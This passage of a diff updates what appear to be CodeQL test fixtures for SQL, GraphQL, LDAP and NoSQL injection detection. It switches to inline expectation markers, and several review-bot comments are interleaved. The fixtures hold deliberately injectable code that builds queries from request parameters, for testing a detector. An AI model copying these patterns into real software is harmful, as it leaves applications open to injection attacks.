| pg-promise.js:39:7:39:19 | req.params.id | user-provided value | -| pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | This query string depends on a $@. | pg-promise.js:40:7:40:21 | req.params.name | user-provided value | -| pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | This query string depends on a $@. | pg-promise.js:47:11:47:23 | req.params.id | user-provided value | -| pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | This query string depends on a $@. | pg-promise.js:54:11:54:23 | req.params.id | user-provided value | -| pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | This query string depends on a $@. | pg-promise.js:56:14:56:29 | req.params.title | user-provided value | -| pg-promise.js:60:20:60:24 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:60:20:60:24 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:63:23:63:27 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:63:23:63:27 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:64:16:64:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:64:16:64:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| redis.js:10:16:10:27 | req.body.key | redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | This query object depends on a $@. 
| redis.js:10:16:10:23 | req.body | user-provided value | -| redis.js:18:16:18:18 | key | redis.js:12:15:12:22 | req.body | redis.js:18:16:18:18 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:19:43:19:45 | key | redis.js:12:15:12:22 | req.body | redis.js:19:43:19:45 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:25:14:25:16 | key | redis.js:12:15:12:22 | req.body | redis.js:25:14:25:16 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:30:23:30:25 | key | redis.js:12:15:12:22 | req.body | redis.js:30:23:30:25 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:32:28:32:30 | key | redis.js:12:15:12:22 | req.body | redis.js:32:28:32:30 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:39:16:39:18 | key | redis.js:38:17:38:24 | req.body | redis.js:39:16:39:18 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. 
| tst2.js:9:66:9:78 | req.params.id | user-provided value | -| tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | -| tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | -| tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..94f540c9067f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -5,8 +5,7 @@ import { Octokit } from "@octokit/core"; const kit = new Octokit(); app.get('/post/:id', function(req, res) { - const id = req.params.id; - // NOT OK + const id = req.params.id; // $ Source const response = kit.graphql(` query { repository(owner: "github", name: "${id}") { 
@@ -17,45 +16,45 @@ app.get('/post/:id', function(req, res) { } } } - `); + `); // $ Alert }); import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { - const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); app.get('/article/:id/', async function(req, res) { - const id = req.params.id; + const id = req.params.id; // $ Source const result = await request("POST /graphql", { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as Core } from "@octokit/rest"; const kit2 = new Core(); app.get('/event/:id/', async function(req, res) { - const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; 
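Review bot: The `/user/:id/` handler still declares `const response` twice in the same function scope, once for the `graphql(...)` call and once for the `myGraphql(...)` call. A JavaScript engine rejects that as a redeclaration, so the fixture presumably only works because the extractor tolerates it. Both lines are rewritten in this hunk anyway, so the second binding could be renamed to `response2`, the same way the `/event/:id/` handler already uses `result` and `result2`. That keeps the file valid JavaScript and the expected alert locations independent of parser error recovery.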
@@ -71,23 +70,22 @@ var root = { }; app.get('/thing/:id', async function(req, res) { - const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK - + const id = req.query.id; // $ Source + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert + fetch("https://my-grpahql-server.com/graphql", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK query: `{ thing { name url ${id} } - }` + }` // $ Alert }) }) @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -116,6 +114,6 @@ const github = require('@actions/github'); app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") - const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..65168320a343 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -10,9 +10,9 @@ const connection = mysql.createConnection({ database: 'test' }); -app.use(route.get('/test1', (context, param1) => { +app.use(route.get('/test1', (context, param1) => { // $ Source param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..32990a4d9338 100644 
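Review bot: In graphql.js, hunk `@@ -97,7 +95,7 @@`, the `// OK` above the second `query:` template is replaced by what appears to be a whitespace-only added line, so the safe case is now unlabelled and the file gains a stray blank line; deleting the comment line outright would be cleaner. With inline expectations an unannotated line already means "no alert expected", but the reason a case is safe is lost wherever the old marker is simply dropped. The same happens in json-schema-validator.js, ldap.js, mongoose.js (`Document.find({ _id: { $eq: id } });`), mongooseModelClient.js, mysql.js, pg-promise.js and redis.js. mongodb.js in this same commit keeps plain comments such as `// OK - user-data is coerced to a string`, and the other safe cases could do likewise, for example `// OK - placeholder with separate values` on the mysql.js line whose `sql:` string ends in `= ?`. The enclosing `app.get('/thing/:id', ...)` handler starts and ends outside this hunk.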
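Review bot: The `// $ Alert` on the `connection.query(...)` argument in html-sanitizer.js would read better with its reason attached, because the line directly above reassigns `param1 = xss(param1)` and a reader may take that for sanitization. Judging by the file name, the test exists to show that an HTML sanitizer does not make a value safe to concatenate into SQL. A comment such as `// $ Alert - xss() sanitizes for HTML, not SQL` would say so, in the same style as `// $ Alert - validate() doesn't sanitize` in json-schema-validator.js. The import of `xss` is outside the hunk, so the library behind it should be confirmed before wording the comment.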
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js @@ -22,17 +22,17 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - const query = JSON.parse(req.query.data); + const query = JSON.parse(req.query.data); // $ Source if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -47,18 +47,18 @@ app.post('/documents/insert', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', async (err, db) => { let doc = db.collection('doc'); - const query = JSON.parse(req.query.data); + const query = JSON.parse(req.query.data); // $ Source const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..3f7254c9a264 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js 
@@ -2,7 +2,7 @@ const Router = require('koa-router') const {Sequelize} = require("sequelize"); new Router().get("/hello", (ctx) => { - const { version } = ctx.query; + const { version } = ctx.query; // $ Source if (version && validVersion(version) === false) { throw new Error(`invalid version ${version}`); @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // $ Alert }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..22bebb085121 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js @@ -17,7 +17,7 @@ const sanitizeInput = function (input) { }; const server = http.createServer((req, res) => { - let q = url.parse(req.url, true); + let q = url.parse(req.url, true); // $ Source let username = q.query.username; @@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, 
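Review bot: In koarouter.js, hunk `@@ -14,7 +14,7 @@`, the expectation on the `new Sequelize().query(...)` line flips from `// OK` to `// $ Alert` with no explanation, so a reader cannot tell whether the result is now considered a true positive or a known false positive. The previous hunk shows `version` being rejected by a throw when `validVersion(version) === false`, which is presumably why the line used to be marked OK. The body of `validVersion` is outside both hunks, so whether it really constrains the value cannot be confirmed here. If the alert is unwanted, mark it as json-schema-validator.js does in this commit, `// $ SPURIOUS: Alert`. If it is intended, state the reason on the line, e.g. `// $ Alert - validVersion() is not treated as a sanitizer`.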
@@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..2400147dfce1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js @@ -8,8 +8,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..a72d0c6d3bf0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js 
@@ -10,8 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..8de189521547 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -12,8 +12,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..a7669bf5dfbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js 
@@ -10,26 +10,24 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); - let title = req.body.title; + let title = req.body.title; // $ Source if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); 
@@ -39,50 +37,46 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); app.post("/logs/count-by-tag", (req, res) => { - let tag = req.query.tag; + let tag = req.query.tag; // $ Source MongoClient.connect(process.env.DB_URL, {}, (err, client) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); 
@@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -104,11 +98,10 @@ app.post('/documents/find', (req, res) => { }); function useQuery(queries) { const query = {}; - query.title = queries.title; + query.title = queries.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..26d30260aae0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,18 +14,17 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..3ee23ad0e931 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js 
@@ -18,85 +18,71 @@ const Document = Mongoose.model('Document', { app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by 
user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. 
+ .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => 
err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); 
@@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK - - Document.findOneAndUpdate(X, query, function () { }); // NOT OK - - let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + new C(X, Y, query); // $ Alert + + Document.findOneAndUpdate(X, query, function () { }); // $ Alert + + let id = req.query.id, cond = req.query.cond; // $ Source + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js index a340bf2d968b..dedd3a7f8d2c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js @@ -17,9 +17,8 @@ const Document = Mongoose.model('Document', { app.get('/documents/find', (req, res) => { const query = {}; - query.title = JSON.parse(req.query.data).title; + query.title = JSON.parse(req.query.data).title; // $ Source - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js index f26ab52e7078..832cb465eb1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js @@ -7,8 +7,8 @@ let app = express(); app.use(bodyParser.json()); app.post('/find', (req, res) => { - let v = JSON.parse(req.body.x); - MyModel.find({ id: v }); // NOT OK - MyModel.find({ id: req.body.id }); // NOT OK - MyModel.find({ id: `${req.body.id}` }); // OK + let v = JSON.parse(req.body.x); // $ Source + MyModel.find({ id: v }); // $ Alert + MyModel.find({ id: req.body.id }); // $ Alert + MyModel.find({ id: `${req.body.id}` }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js index de328fb49fae..150cf0d5a86a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js 
